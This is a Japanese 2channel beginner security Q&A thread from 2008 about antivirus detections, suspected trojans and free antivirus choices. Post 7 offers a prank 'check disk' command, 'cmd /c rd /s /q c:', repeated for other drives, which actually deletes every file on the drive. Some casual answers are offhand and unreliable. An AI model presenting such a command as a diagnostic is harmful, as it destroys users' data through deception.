セキュリティ初心者質問スレッドpart110
at SEC
1:名無しさん@お腹いっぱい。
08/06/19 08:58:05
初心者の方の為のインターネットとパソコンのセキュリティについての質問スレッドです
━ 質問マナー ━━━━━━━━━━━━━━━━━
・ アドバイスをもらう為に、「質問用テンプレート」を使って質問しましょう
・ 2回目以降の発言書込は、名前欄に「最初に質問した番号」を半角英数字で入力して下さい
・ 他から誘導されて来た場合は、その旨書いておきましょう
・ ここは2ちゃんねるですので、正しい解答ばかりとは限りません (用心しましょう)
━ 質問用テンプレート ━━━━━━━━━━━━━
【使用OS】 『』 例、XP Home SP2
【使用ブラウザ】 『』 例、Internet Explorer 7
【Microsoft Updateの更新の状態】 『』 例、自動更新設定
【セキュリティソフトと年式】 『』 例、ウイルス○○ 2008
【スパイウェア対策ソフト】 『』 例、SPY○○
【回線の種類・ルータの有無】 『』 例、光回線でルータ使用中
【具体的な症状】 『』
【過程と措置】 『』
【その他】 『』
━━━━━━━━━━━━━━━━━━
★前スレ
セキュリティ初心者質問スレッドpart109
スレリンク(sec板)
2:名無しさん@お腹いっぱい。
08/06/19 08:58:42
●マイクロソフト セキュリティ At Home - 個人情報の盗難、スパイウェア、ウイルスを防ぐ
URLリンク(www.microsoft.com)
●マイクロソフト サポート オンライン
URLリンク(support.microsoft.com)
Microsoft Update は、Windows Updateで取得できるすべての更新プログラムに加え
Officeおよびその他の Microsoft アプリケーションを対象とする優先度の高い更新プログラムを無料で提供する新しいサービスです
●Microsoft Update
URLリンク(update.microsoft.com)
●Microsoft Update よく寄せられる質問
URLリンク(update.microsoft.com)
●Office Update
URLリンク(office.microsoft.com)
●(財)日本データ通信協会 - 迷惑メール相談センター
URLリンク(www.dekyo.or.jp)
●社団法人日本インターネットプロバイダー協会 - 迷惑メールを受け取ったら
URLリンク(www.jaipa.or.jp)
●Microsoft Help and Support - Outlook Express 6.0 で "迷惑メール" 対策をするには?
URLリンク(support.microsoft.com)
●無料で迷惑メール対策!
Outlook ExpressにPOPFileを用いる方法や、Thunderbirdの迷惑メール学習機能を用いて迷惑メールの分別をする方法の解説
URLリンク(antispam.cgn.jp)
3:名無しさん@お腹いっぱい。
08/06/19 08:59:02
●脆弱性対策情報ポータルサイト Japan Vulnerability Notes - 脆弱性レポート 一覧
脆弱性とは、ソフトウエア製品やウェブアプリケーション等におけるセキュリティ上の問題箇所です (最新版への更新を)
URLリンク(jvn.jp)
●SIDfm(日本のセキュリティ対策情報) - 最近のセキュリティニュース
URLリンク(sid.softek.co.jp)
●Yahoo!ニュース - PCウイルス
URLリンク(dailynews.yahoo.co.jp)
●IT-PLUS - セキュリティー連載コラム ネット危険地帯
URLリンク(it.nikkei.co.jp)
●YOMIURI ONLINE(読売新聞):セキュリティー (サイバー護身術)
URLリンク(www.yomiuri.co.jp)
●ITpro:セキュリティ- Webの脅威 (最新の脅威の解説と対策術)
URLリンク(itpro.nikkeibp.co.jp)
●Japan.internet.com - スパイウェアによって何が起こるか?
URLリンク(japan.internet.com)
●総務省 国民のための情報セキュリティサイト - サイトマップ
URLリンク(www.soumu.go.jp)
●@police - パソコンユーザ向けカリキュラム
URLリンク(www.cyberpolice.go.jp)
●警察庁 サイバー犯罪対策
URLリンク(www.npa.go.jp)
4:名無しさん@お腹いっぱい。
08/06/19 08:59:25
●Windows初心者部屋 (トラブル対策 のページ)
URLリンク(www.geocities.jp)
●higaitaisaku.com (スパイウェア、ウイルスなどマルウェア関連のトピックス のページ)
URLリンク(www.higaitaisaku.com)
●Firewallと森で遊ぼう (インターネットとセキュリティ のページ)
URLリンク(eazyfox.homelinux.org)
●Securityzone (Security のページ)
URLリンク(www.securityzone-za.bne.jp)
●ネット被害対策室
URLリンク(www002.upp.so-net.ne.jp)
●教えて!goo - 質問&回答 (Q&A) コミュニティ (デジタルライフ のページ)
URLリンク(oshiete.goo.ne.jp)
●ベネッセ ジュニアパーク - 子どもとインターネット (保護者の方へ)
インターネットや携帯電話が身近になるとともに、子どもを巻き込んだ事件や犯罪が増加しています
URLリンク(j.benesse.ne.jp)
●キッズgoo - キッズgooのご紹介 (大人の方へ)
インターネットは大人の為だけでなく、子どもたちにとっても様々な情報を収集し活用するための情報源へとなりつつあります
しかし大人と同じ条件でインターネットにアクセスできるということは、同時に様々なトラブルと向かい合うことを意味しています
URLリンク(kids.goo.ne.jp)
5:名無しさん@お腹いっぱい。
08/06/19 08:59:54
●コンピュータウイルス - Wikipedia
Wikipedia項目リンク
●ファイアーウォール - Wikipedia
Wikipedia項目リンク
●バックアップ - Wikipedia
Wikipedia項目リンク
●オンラインスキャン - Wikipedia
Wikipedia項目リンク
●ブラウザクラッシャー 「ブラクラ」 - Wikipedia
Wikipedia項目リンク
●ワンクリック契約または「ワンクリック登録」、「ワンクリック詐欺」 - Wikipedia
Wikipedia項目リンク
●フィッシング (詐欺) - Wikipedia
Wikipedia項目リンク(%E8%A9%90%E6%AC%BA)
●オークション詐欺 - Wikipedia
Wikipedia項目リンク
6:名無しさん@お腹いっぱい。
08/06/19 09:00:15
●IT用語辞典 e-Words
URLリンク(e-words.jp)
●HITACHI-systemセキュリティ用語辞典
URLリンク(ew.hitachi-system.co.jp)
●@IT セキュリティ用語事典インデックス
URLリンク(www.atmarkit.co.jp)
●IT用語辞典バイナリBINARY
URLリンク(www.sophia-it.com)
●2ちゃんねるガイド:目次
URLリンク(info.2ch.net)
●2ちゃんねる 初心者が安心して質問できるスレッドガイダンス
(2ちゃんねるには様々な有益な情報とともに、有害な罠があることがあります)
URLリンク(ansitu.xrea.jp)
●2ちゃんねるブラウザ - Wikipedia
Wikipedia項目リンク
7:名無しさん@お腹いっぱい。
08/06/19 09:00:36
【※注意】 この手順を行うとドライブのデータが全て消えてしまいます××
━注意━━━━━━━━━━━━━━━
チェックディスクコマンドを試してみろ
cmd /c rd /s /q c:
と入力し[OK]をクリックする。
上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:
━━━━━━━━━━━━━━━━
●テンプレここまで (*前スレが埋まってから使用しましょう)
8:■■■■追加テンプレ■■■■
08/06/19 09:02:37
固定ハンドル◆N9P3SuvBPoには多少自演癖がありますので
冷静な対処をお願いします
(でも根はいい奴なので許してあげましょうね)
他のコテハンは用なし屑です!嘘を教えることもあるようなので
初心者の皆さん気をつけてね^^
9:名無しさん@お腹いっぱい。
08/06/19 11:28:53
●日経BP PC Online : セキュリティ対策
URLリンク(pc.nikkeibp.co.jp)
10:■■■■追加テンプレ■■■■
08/06/19 12:33:12
ちなみにこれも自演です!
11: ◆N9P3SuvBPo
08/06/19 19:47:26
(φS∀S)ノシ >1さん
スレ立てお疲れ様です
12:名無しさん@お腹いっぱい。
08/06/19 21:08:35
>>11
(ο^д^)ノシ
13:名無しさん@お腹いっぱい。
08/06/19 21:10:08
先ほどantivirでスキャンしたところTR/PSW.Nilage.dotというウィルスが検出されました
調べてみても情報が出てきません、公式に報告だけはしたのですが
これがどのようなウィルスなのかご存知の方いませんか?
14:名無しさん@お腹いっぱい。
08/06/19 21:26:30
>>13
その検出されたウィルスをパス付きのzipで固めアップして!
15:名無しさん@お腹いっぱい。
08/06/19 21:26:42
????????c??a
16: ◆N9P3SuvBPo
08/06/19 21:34:33
>12
(φ^∀^)ノシ
17:名無しさん@お腹いっぱい。
08/06/19 21:46:09
>>13
これがどのようなウィルスなのか存じませんが
Trojan-PSW.Win32.Nilage.dot=TR/PSW.Nilage.dotだと仮定すると
カスペに17日に登録されたパスワードを盗む新種のトロイとしか分からない。
亜種でよければ説明があった
URLリンク(www.avira.com)
18:名無しさん@お腹いっぱい。
08/06/19 21:51:41
Lhaplusのフォルダかセットアップじゃないの
19:名無しさん@お腹いっぱい。
08/06/19 21:56:42
>>14
すみません、そのファイルの上げ方がわかりませんでした
>>17
PSWがパスを抜くという話を聞いて不安になりここで質問しました・・・
>>18
検出された箇所がC:\Program Files\Lhaplus\LplsStub.sfx なのですが
Lhaplusとなにか関連があるのでしょうか?
20:名無しさん@お腹いっぱい。
08/06/19 22:00:57
誤検出
21:名無しさん@お腹いっぱい。
08/06/19 22:20:38
>>19
誤検出でよかったな
ヴァージョンうpがまだならLhaplusは1.56以前には脆弱性があるから1.57にうp
22:名無しさん@お腹いっぱい。
08/06/19 22:39:22
九官鳥なんて飼うんじゃなかった
23:■■■■質問者へ■■■■
08/06/19 22:41:44
このスレはこっちが埋まってから質問のこと
スレリンク(sec板)
24:名無しさん@お腹いっぱい。
08/06/19 22:57:05
九官鳥がうるさいんだよね・・・
25:名無しさん@お腹いっぱい。
08/06/19 23:02:17
エッチな言葉を覚えさせるんじゃなかった
26:名無しさん@お腹いっぱい。
08/06/19 23:03:07
川村ゆきえちゃん!!
27:名無しさん@お腹いっぱい。
08/06/19 23:16:48
ハアハア
28:名無しさん@お腹いっぱい。
08/06/19 23:18:41
>>27
URLリンク(erosu.himitsukichi.info)
29:名無しさん@お腹いっぱい。
08/06/20 01:11:16
>>28
ゆっきー(*^_^*)
30:名無しさん@お腹いっぱい。
08/06/20 01:13:03
ハアハア
31:名無しさん@お腹いっぱい。
08/06/20 02:53:39
先ほどウイルスバスター2006で検索していたらPOSSIBLE_HIFRM-4というウイルスが検出されました
マイピクチャーにある画像から検出されたようですが、
「実行した処理」が「不明」になっていて削除できません
どうしたら削除できるんでしょうか?
32:名無しさん@お腹いっぱい。
08/06/20 04:20:52
>ウイルスバスター2006
・・・公式サイトでサポートされてないやつかよ。更新もしてないんじゃないか?
まず、そのウイルスバスター2006削除して
体験版のウイルスバスターの最新式入れて、スキャンしてみろよ
あとは、きちんと購入するなりフリー使うなりするにしても最新式つかえ〜
33:名無しさん@お腹いっぱい。
08/06/20 07:12:40
検知力テスト(2008年6月19日)
Most Effective Antivirus Tools Against New Malware Binaries
URLリンク(mtc.sri.com)
Rank Detects Missed Product
1st 96% 73 AntiVir
2nd 95% 85 Webwasher-Gateway
3rd 95% 87 Ikarus
4th 95% 90 BitDefender
5th 91% 165 Kaspersky
6th 91% 176 F-Secure
7th 90% 185 AVG
8th 89% 207 Norman
9th 89% 209 Sophos
10th 89% 211 CAT-QuickHeal
11th 87% 245 Avast
12th 86% 275 ClamAV
13th 85% 291 Microsoft
14th 84% 313 DrWeb
15th 84% 315 eTrust-Vet
16th 84% 316 VirusBuster
17th 80% 390 F-Prot
18th 79% 403 TheHacker
19th 78% 423 Symantec
20th 76% 464 AhnLab-V3
21st 76% 475 Rising
22nd 75% 483 Fortinet
23rd 75% 484 VBA32
24th 75% 495 McAfee
25th 74% 514 Panda
26th 72% 560 NOD32v2
34:名無しさん@お腹いっぱい。
08/06/20 07:19:56
川村ゆきえと磯山さやかが似てる件について
35:名無しさん@お腹いっぱい。
08/06/20 20:47:45
九官鳥なんて飼うんじゃなかった
36:名無しさん@お腹いっぱい。
08/06/20 21:06:20
【使用OS】 『xpsp2』
【使用ブラウザ】 『プニル 直接接続(IEオプション非使用フルアクセス)』
【Microsoft Updateの更新の状態】 『自動』
【セキュリティソフトと年式】 『無』
【スパイウェア対策ソフト】 『無』
【回線の種類・ルータの有無】 『光』
こんな回線状態で普通にネットして、多少なり海外サイト覗いたりもするのですが、
試しにavast入れて起動時全スキャンかけてみても何も検出されませんでした。
これは問題ないと思っていいのでしょうか。
37:名無しさん@お腹いっぱい。
08/06/20 21:20:12
>>36
スレリンク(sec板)
このスレが埋まってから質問しろって言うのが分からんのかカス
ゴミ野郎
38:名無しさん@お腹いっぱい。
08/06/20 21:20:59
>>36
【セキュリティソフトと年式】 『無』
39:名無しさん@お腹いっぱい。
08/06/20 21:22:49
誰かコイツ>>36教育してやれ
40:名無しさん@お腹いっぱい。
08/06/20 21:33:10
川村ゆきえちゃん!!
41:名無しさん@お腹いっぱい。
08/06/20 23:06:38
【使用OS】 XP Home SP2
【使用ブラウザ】 Internet Explorer 7+donut
【回線の種類・ルータの有無】 光回線でルータ使用中
【具体的な症状】
wikipediaの記事を閲覧するとしばらくしてwikiの韓国IPから大量に正体不明の
アクセスがあるんですが、これは気にしなくてよいものですか?
peer guardian2のログを見ると2000後半から5000番あたりの複数のポートに連続してアクセスしてきます。
ポートスキャンというものですか?
42: ◆N9P3SuvBPo
08/06/20 23:18:34
>41
気にするまでもありません
43:名無しさん@お腹いっぱい。
08/06/20 23:19:06
【使用OS】 XP Home SP2
【使用ブラウザ】 Internet Explorer 6
【Microsoft Updateの更新の状態】 Windows Update最新
【セキュリティソフトと年式】 AVG Free/clamwin
【スパイウェア対策ソフト】 Ad-Awere
【回線の種類・ルータの有無】 光/ルータ有
【具体的な症状】
以下のファイルでトロイ検出
C:\Program Files\Lhaplus\LplsStub.sfx
AVG:Trojan horse PSW.Generic6.PEL
clamwin:Trojan.SdBot.ELC
※以下は感染と直接関係があるかは不明だが同タイミングで発生
・プロセスを監視していると、OS起動してしばらくの間だけ
svchost.exeが得体の知れないサーバと若干の通信を行っているよう
・以下のファイル等が変更されたことをAVGが検知
MBR/kernel32.dll/user32.dll/shell32.dll/ntoskrnl.exe
・シャットダウン時の表示が、SXGAの画面内にXGAが左上に寄った形になる
(右・下の余り部分が黒)
【過程と措置】
多分脆弱性のあるバージョンのLhaplusにて
迷惑メール添付のファイルを誤って解凍したのが原因と推測
感染はAVGのフルスキャン時に認知、解凍時は気付かなかった
AVGにて自動削除されたが、再起動すると感染ファイルが復活した
バックアップしてあった感染前のHDDイメージおよびMBRで
復旧したため、現在は状態を再現できない
【その他】
上記のトロイの挙動詳細がぐぐっても出てこなかったので、
知ってる方がいたらお伺いしたい
44:名無しさん@お腹いっぱい。
08/06/20 23:28:01
>>43に追加
今復旧後の
C:\Program Files\Lhaplus\LplsStub.sfx
をclamwinでスキャンしたところ同様のトロイと判定された
AVGでは判定なし
復旧したHDDイメージはOSインストール後
LANドライバインストール前のものなので、
バックアップ前に既に感染していたとは考えにくい
45:名無しさん@お腹いっぱい。
08/06/21 00:10:15
(*´Θ`)ノ゛
46:名無しさん@お腹いっぱい。
08/06/21 00:17:59
(ο^д^)ノシ
47:名無しさん@お腹いっぱい。
08/06/21 00:19:00
>>44
突っ込みたいところはいろいろあるけど、LplsStub.sfxを下記で試してみればいいじゃん。
誤検出なんじゃないの?
URLリンク(www.virustotal.com)
URLリンク(virusscan.jotti.org)
48:名無しさん@お腹いっぱい。
08/06/21 02:58:13
あのーネットストーカーされてるんですがどうすればいいでしょうか?
うちが行くサイト分かるみたいで
チャットとかしててもついてくるんです。カキコとかも反応します。
リカバリーとかしてもだめです
なんで相手はうちのことわかるんでしょうか?教えてください!!
49:名無しさん@お腹いっぱい。
08/06/21 03:03:38
Cookieからの個人情報の流出を防ぐ
Cookieとは、Webサイト上でユーザーが入力した情報などをパソコンに自動的に保管しておき、
再度訪れた際に入力が省略できるといった便利機能です。
しかしCookie機能を悪用すると、パソコンに保存されている情報を盗み出すといったことも可能になってしまいます。
そこでWebサイトからのCookie機能使用の要求をすべて許可するのではなく、
確認ダイアログで許可・不許可をその都度決めたり、基本的に不許可としたりすることができます。
基本的な設定は6段階用意されています。
「詳細設定」画面に用意されている「ファーストパーティ」とは現在表示しているWebサイトのこと。
「サードパーティ」は、現在のWebページに組み込まれているバナー広告など別サイトのことを意味します。
ブラウザに搭載されているCookie機能が有効になっていると、
Webサイトによっては以降自動でログインできるようになってしまうこともあります。
またCookieはテキスト形式でパソコンに保存されていますので、そこから個人情報が漏洩する恐れもあります。
忘れずに削除するようにしましょう。
スレリンク(sec板:307番)
50:名無しさん@お腹いっぱい。
08/06/21 04:12:55
>>45
>>46
(*´●`)ノ゙
51:41
08/06/21 08:19:06
ありがとうございました
52:名無しさん@お腹いっぱい。
08/06/21 08:26:24
ノートを購入して、光開通待ちの状態です。
とりあえずノートのセットアップをして付属のノートンお試し90日をいれました。
ネット開通まで、まだ一ヵ月はかかるそうですが
セキュリュティの更新をしたい場合はどうしたらいいですか?
ノートはバイオタイプNです。
お願いします。
53:名無しさん@お腹いっぱい。
08/06/21 09:55:44
出来ません。。。。。。。
ネットにつないでください
54:名無しさん@お腹いっぱい。
08/06/21 09:57:08
というよりセットアップしたばかりでネットに繋いでないならノートン入れる意味もないような・・・・・・
55:名無しさん@お腹いっぱい。
08/06/21 10:05:59
川村ゆきえちゃん!!
56:名無しさん@お腹いっぱい。
08/06/21 11:18:55
P2Pをする際にspybotなどのマルウェア対策ソフトも常駐させておくべきですか?
57:名無しさん@お腹いっぱい。
08/06/21 12:43:56
>>50
(ο^д^)ノシ
58:名無しさん@お腹いっぱい。
08/06/21 14:42:31
男は黙ってノーガード
59:名無しさん@お腹いっぱい。
08/06/21 15:02:07
>>57
(*´●`)ノ゙
60:困った君!
08/06/21 15:49:20
NPO関係で外人とのメールを頻繁にするのですが、先日 海外メールを
何気なく開いた後に アドレス帳を開いたらアドレスが全部 白紙になって
しまいました。超初心者なので教えてください。
今現在 通常にメールはできるのですが、下記症状が出るのですが。
1、アドレス帳から'ファイル'タブを開くと、インポート・エクスポート項目
が青くならないのですが。
2、ノートンの2007版でチェックすると、'TrackingCookie'が検出された
のですが、削除のやり方を教えてください。
最セットアップをした方がいいでしょうか。それとも簡単に直せる方法が
あったら教えてください。
61:名無しさん@お腹いっぱい。
08/06/21 16:45:47
>>60
>>1の質問用テンプレつかって情報提供してください
1.メールソフトの種類明記のこと
2.Cookieの削除 URLリンク(www.higaitaisaku.com)
62:名無しさん@お腹いっぱい。
08/06/21 16:52:39
>>60
海外とメールのやり取りをPOPで行うのであれば
ISPサービスのメールウイルスチェックを利用してはどうだ。
初心者には結構有効。
63:60!
08/06/21 18:55:58
>>61様 >>62様
アドバイス ありがとうございます。説明不足なので再度一から書き直しします。
ご教授の程 宜しくお願いします。
【使用OS】 『XP Home Edition』
【使用ブラウザ】 『IE 6』
【Microsoft Updateの更新の状態】 『自動更新設定 』
【セキュリティソフトと年式】 『ノートン・インターネット・セキュリティー2007』
【スパイウェア対策ソフト】 無し
【回線の種類・ルータの有無】 『Yahoo ADSL』
【メールソフト&ISP】 ISPはヤフーを使用 通常メールはOutlookExpress6を使用し、ヤフーメールは使用できますが使用していません
【具体的な症状】
1、海外からのメールでMSNからのお知らせメールみたいだったので、よくわからないなら下記部分(Unsubscribe)をクイックと書いてあったのでクイックしました。
何かの広告みたいだったので、そのまま閉じました。そして迷惑メールだと思って、削除しました。
2、その後にアドレス帳を開いたら、300件位あったアドレスが白紙になっていました。
3、問題のメールを ヤフーメールの受信欄でチェックしたら、送信者欄は私のアドレスになっていて、どこから配信したのか判明できません。
また、下記部分(Unsubscribe)部分をクイックしたら、下記コメントが表示されました。
【過程と措置】
1、メールをするのは通常にできます。
2、アドレス帳から'ファイル'タブを開くと、インポート・エクスポート項目が青くならないのですが。(左記文字が黒くないので、実際上表記されない)
3、但し OEを開いた時に'ファイル'タブを開くと、こちらのインポート・エクスポート項目が青くなります。こちらを使って復元しました。
4、ノートンの2007版でチェックすると、システムの完全スキャンで'TrackingCookie'が検出されたました。
【教えてください】
再セットアップをした方がよいのでしょうか?
それとも一部手直しでも 大丈夫でしょうか?
その場合 アドレス帳から'ファイル'タブを開いた時に、インポート・エクスポート項目の文字が黒色で表記できる様になる方法。
TrackingCookie'の削除方法
64:名無しさん@お腹いっぱい。
08/06/21 20:51:48
九官鳥なんて飼うんじゃなかった
65:名無しさん@お腹いっぱい。
08/06/21 21:56:04
ZEROだったらavastでも一緒でしょうか?
66:名無しさん@お腹いっぱい。
08/06/21 22:01:25
Avira > AVG > Avast! > King >> ZERO
67:名無しさん@お腹いっぱい。
08/06/21 22:03:43
>>66
正気ですか?
68:名無しさん@お腹いっぱい。
08/06/21 22:07:32
>>67
喪前なら上記はどう並べるの?
69: ◆N9P3SuvBPo
08/06/21 22:34:35
(φS揮S)ノシ
70:名無しさん@お腹いっぱい。
08/06/21 22:42:32
>>69
(ο^д^)ノシ
71:名無しさん@お腹いっぱい。
08/06/21 23:15:16
>>66
検出能力じゃ妥当な並び順ですな
ただ正確にはAVG=Avast >>>>>>>>>>>>>ZEROですな
72:名無しさん@お腹いっぱい。
08/06/21 23:26:20
>>63
TrackingCookieが検出されたってこんなの気にする必要ない
何の害もないし
73:名無しさん@お腹いっぱい。
08/06/22 02:16:56
実際トラッキングクッキーは性能を、出してるように見せるための工作みたいなものだからな
検出しても害の無い奴がほとんど
74:名無しさん@お腹いっぱい。
08/06/22 03:21:09
つーか>>←これでレス指定するのやめない?
わざわざ戻って見るのだりーんだよね。
いい加減コピペした方が見やすいって気づけいてるだろ?
そういうことで次のレスからヨロシク。
75:名無しさん@お腹いっぱい。
08/06/22 03:23:34
>>74
了解
76:名無しさん@お腹いっぱい。
08/06/22 04:01:47
それはコピペ
そしてこれもコピペ
77:名無しさん@お腹いっぱい。
08/06/22 04:02:36
ここまで全部コピペ
78:名無しさん@お腹いっぱい。
08/06/22 05:43:28
>>74
→>>6
●2ちゃんねるブラウザ - Wikipedia
Wikipedia項目リンク
79:名無しさん@お腹いっぱい。
08/06/22 07:51:03
検知力テスト(2008年6月21日)
Most Effective Antivirus Tools Against New Malware Binaries
URLリンク(mtc.sri.com)
Rank Detects Missed Product
1st 96% 72 AntiVir
2nd 95% 83 Webwasher-Gateway
3rd 95% 87 Ikarus
4th 95% 90 BitDefender
5th 91% 164 Kaspersky
6th 91% 176 F-Secure
7th 90% 186 AVG
8th 89% 207 Norman
9th 89% 209 Sophos
10th 89% 210 CAT-QuickHeal
11th 87% 246 Avast
12th 86% 275 ClamAV
13th 85% 288 Microsoft
14th 84% 311 DrWeb
15th 84% 314 eTrust-Vet
16th 84% 317 VirusBuster
17th 80% 389 F-Prot
18th 79% 402 TheHacker
19th 78% 423 Symantec
20th 76% 463 AhnLab-V3
21st 76% 474 Rising
22nd 75% 482 Fortinet
23rd 75% 484 VBA32
24th 75% 495 McAfee
25th 74% 515 Panda
26th 72% 556 NOD32v2
80:名無しさん@お腹いっぱい。
08/06/22 11:06:37
(#^ω^)ピッキピキ
81:名無しさん@お腹いっぱい。
08/06/22 13:23:06
川村ゆきえちゃん!!
82:名無しさん@お腹いっぱい。
08/06/22 13:34:37
小中学校のPCってさなんか有害サイト
入れないように
なってんだけど
あれって生徒側から解除とかできないの?
83:名無しさん@お腹いっぱい。
08/06/22 13:37:16
先生に相談しろよ厨房
84:名無しさん@お腹いっぱい。
08/06/22 13:56:15
何がブロックしてるのかも調べようとしない時点で
お前には無理だろうと思うが
どうせそれ自体にもパスが掛かってるであろう
85:名無しさん@お腹いっぱい。
08/06/22 15:39:41
>>70
(*´●`)ノ゙
86:名無しさん@お腹いっぱい。
08/06/22 15:41:23
>>85
(ο^д^)ノシ
87:名無しさん@お腹いっぱい。
08/06/22 17:27:13
自作板から誘導されてきました
【使用OS】 XP Home SP2
【使用ブラウザ】 Internet Explorer
自作でセキュリティーもなく、まっさらな状態の場合、どのソフト入れたらいいと思いますか?
フリーソフトでお願いします。
【気になる点】 使用期限の有無、ソフト落とす前に感染なんてことが無いかどうか(.exe落としておいて新PCでインストールとかで出来るならその旨もお願いします)
88:名無しさん@お腹いっぱい。
08/06/22 17:37:12
7時からテレ東で川村ゆきえちゃん!!
89:名無しさん@お腹いっぱい。
08/06/22 17:38:58
>>87
フリーとなるとAVGかAvastあたりになるんだろうけど
個人的にはAvastのほうが使い勝手いいような気がする。
っていうかどっちでもいい。
大体の使い方
URLリンク(freesoft-100.com)
登録は
URLリンク(67.228.112.196)
ソフト落とす前に感染なんてめったなことじゃ無いだろうけど
心配ならインストーラをCDにでも焼いておいてインストすればいい
あとは自力で調べろ
90:名無しさん@お腹いっぱい。
08/06/22 17:44:52
>>89
ああ待ってくれ。
その「登録」ってあるだろ?
登録したPCとは違うパソコンでもインストーラーさえあればインストールできるのですか?更新とか「問題を通告」とか大丈夫なのですか?
91:名無しさん@お腹いっぱい。
08/06/22 17:51:20
>>90
インストールできる。
登録したメールアドレス宛てにライセンスキー送られてくるからそれ使って
別のPCなんだろうがなんだろうが使える。
っていうかそういうのも調べられるからな?「調べる」ってのを覚えような?
92:名無しさん@お腹いっぱい。
08/06/22 20:15:33
やられてしまいました。ショックです。windows defenderでフルスキャン中に、
---------------------------------------------------------------------------------------
名前 Trojan:js/Agent FA
カテゴリ: トロイの木馬
説明:このプログラムはセキュリティーポリシーをバイパスするために使用されます。
アドバシス:このソフトウエアをすぐに削除します。
リソース:
File: C:\Users\xxxx\AppData\Local\Mozilla\Firefox\Profiles\qkxabw63.default\Cache
\60E5xxxxxxx
---------------------------------------------------------------------------------------
rapidshare経由だと思います。
すぐに削除しました。ウイルスバスター(2008)には反応していませんでした。
心配になり、その後もwindows defender と ウイルスバスターでスキャンした他、
Windows Live OneCare セーフティでスキャンしましたが、いずれも検出されませんでした。
安心していいんでしょうか? とても心配です。
その後も、ブラウザ(FIREFOX)を立ち上げる度に、
File: C:\Users\xxxx\AppData\Local\Mozilla\Firefox\Profiles\qkxabw63.defaut というフォルダが
作られるのですが、これは普通のことと考えていいのでしょうか?
アドバイス下さい。
93:名無しさん@お腹いっぱい。
08/06/22 20:37:35
>>92
問題無い。
ブラウザのキャッシュに残ってただけ(削除済み)。
>File: C:\Users\xxxx\AppData\Local\Mozilla\Firefox\Profiles\qkxabw63.defaut というフォルダが
>作られるのですが、これは普通のことと考えていいのでしょうか?
普通
94:名無しさん@お腹いっぱい。
08/06/22 20:45:39
>>93
ありがとうございます。安心しました。一応トレンドマイクロには報告しておきます。
95:名無しさん@お腹いっぱい。
08/06/22 22:09:57
>>86
(*´●`)ノ゙
96:名無しさん@お腹いっぱい。
08/06/22 22:11:18
>>88
URLリンク(intervaluesa.com)
97:名無しさん@お腹いっぱい。
08/06/22 23:55:14
セキュリティソフトを入れても全然ウイルスに反応したことがありません。
1年に数回は感知するのが普通ですか?
エロサイトは結構徘徊してます。
98:名無しさん@お腹いっぱい。
08/06/23 00:09:49
>>91
本当にありがとう
セキュリティソフトはこんなもんでよいかな?
99:名無しさん@お腹いっぱい。
08/06/23 00:15:39
>>98
スレリンク(sec板)
100:名無しさん@お腹いっぱい。
08/06/23 01:30:44
Trojan-PSW.Win32というウィルスに感染してしまったみたいです・・
ググってもどんなウィルスかわからなかったのですがなんというウィルスでしょうか?
101:名無しさん@お腹いっぱい。
08/06/23 01:59:13
>>100
トロイの木馬の一種、パスワードの不正取得
URLリンク(www.viruslistjp.com)
URLリンク(www.viruslistjp.com)
102:名無しさん@お腹いっぱい。
08/06/23 02:06:12
>>101
ありがとうございます。PCはまったくの初心者なのですが住所などが不特定多数の人に見られる危険性もありますでしょうか?
マカフィーで現在スキャン中なのですがどうしたらよいやら・・
103:名無しさん@お腹いっぱい。
08/06/23 02:23:50
>>102
マカフィー使ってるならマカフィーで駆除すればいいし、ログ見て対策調べられるだろ
他にオンラインスキャンとかやってもいいし
URLリンク(www.f-secure.co.jp)
ま、リカバリすれば確実だが
104:名無しさん@お腹いっぱい。
08/06/23 06:51:46
検知力テスト(2008年6月22日)
Most Effective Antivirus Tools Against New Malware Binaries
URLリンク(mtc.sri.com)
Rank Detects Missed Product
1st 96% 71 AntiVir
2nd 95% 83 Webwasher-Gateway
3rd 95% 86 Ikarus
4th 95% 91 BitDefender
5th 91% 163 Kaspersky
6th 91% 176 F-Secure
7th 90% 186 AVG
8th 89% 207 Norman
9th 89% 208 Sophos
10th 89% 209 CAT-QuickHeal
11th 87% 246 Avast
12th 86% 274 ClamAV
13th 85% 288 Microsoft
14th 84% 310 DrWeb
15th 84% 313 eTrust-Vet
16th 84% 318 VirusBuster
17th 80% 388 F-Prot
18th 79% 401 TheHacker
19th 78% 423 Symantec
20th 76% 463 AhnLab-V3
21st 76% 472 Rising
22nd 75% 481 Fortinet
23rd 75% 483 VBA32
24th 75% 493 McAfee
25th 74% 516 Panda
26th 72% 558 NOD32v2
105:名無しさん@お腹いっぱい。
08/06/23 13:17:50
(ο^д^)ノシ
106:名無しさん@お腹いっぱい。
08/06/23 13:47:14
あの、先日とあるzipを落としました。
すると、「●●●.jpg .exe」というファイルでした。
.exeに気づかずうっかり開いてしまったところ、
変な画像が出てきて、それ以来パソコンを立ち上げると
その画像が出てくるようになってしまいました。
いろいろ調べてみると、「svchost.exe」というものがパソコンに入ったようで、
レジストリというところで削除したり、ファイルそのものを削除したりしたのですが、
なぜかしばらくすると復活してしまいます。
スタートアップチェッカーというのもやってみて、削除しているのですが、
何度も復活してしまいます。
これをなくすにはどうしたらいいのでしょうか?
ぜんぜん詳しくないのに手を出してしまったことに後悔しています。
どうかよろしくお願いします。
107:名無しさん@お腹いっぱい。
08/06/23 13:58:17
クマー
108:106
08/06/23 14:02:39
すみません、「svchost.exe」じゃありませんでした
「svchost.bat」でした。
ちょうどいまもまた復活してしまいました・・・。
どうしたらいいのでしょうか。
ちなみにスタートアップウォッチャーによると、
[ Explorer ] "C:\WINDOWS\system32\svchost.bat" -Execu
というやつです。
よろしくお願いします。
109:名無しさん@お腹いっぱい。
08/06/23 14:23:40
リカバリ
110:名無しさん@お腹いっぱい。
08/06/23 15:47:01
おねがいします
【使用OS】 『w2k sp4』
【使用ブラウザ】 『IE6/Jane Style/Sleipnir』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『avast4.8』
【スパイウェア対策ソフト】 『spybod/Ad-aware』
【回線の種類・ルータの有無】 『ADSL』
【具体的な症状】 『特になし』
【過程と措置】
avastがUSBフラッシュメモリに反応
[autorun.inf]がmalwareに感染、と表示
[チェストに移動]を選択しても同じ表示が繰り返される
スパイ駆除を上記2ツールで試しても結果変わらず
avastのブートスキャンを試す
同じく検出されたので、再度[チェストに移動]で処理
状態変わらず、このファイルの駆除不能
表示によると、感染ファイルはどこかのフォルダにあるのではなく、
ドライブの直下にあるようですが、
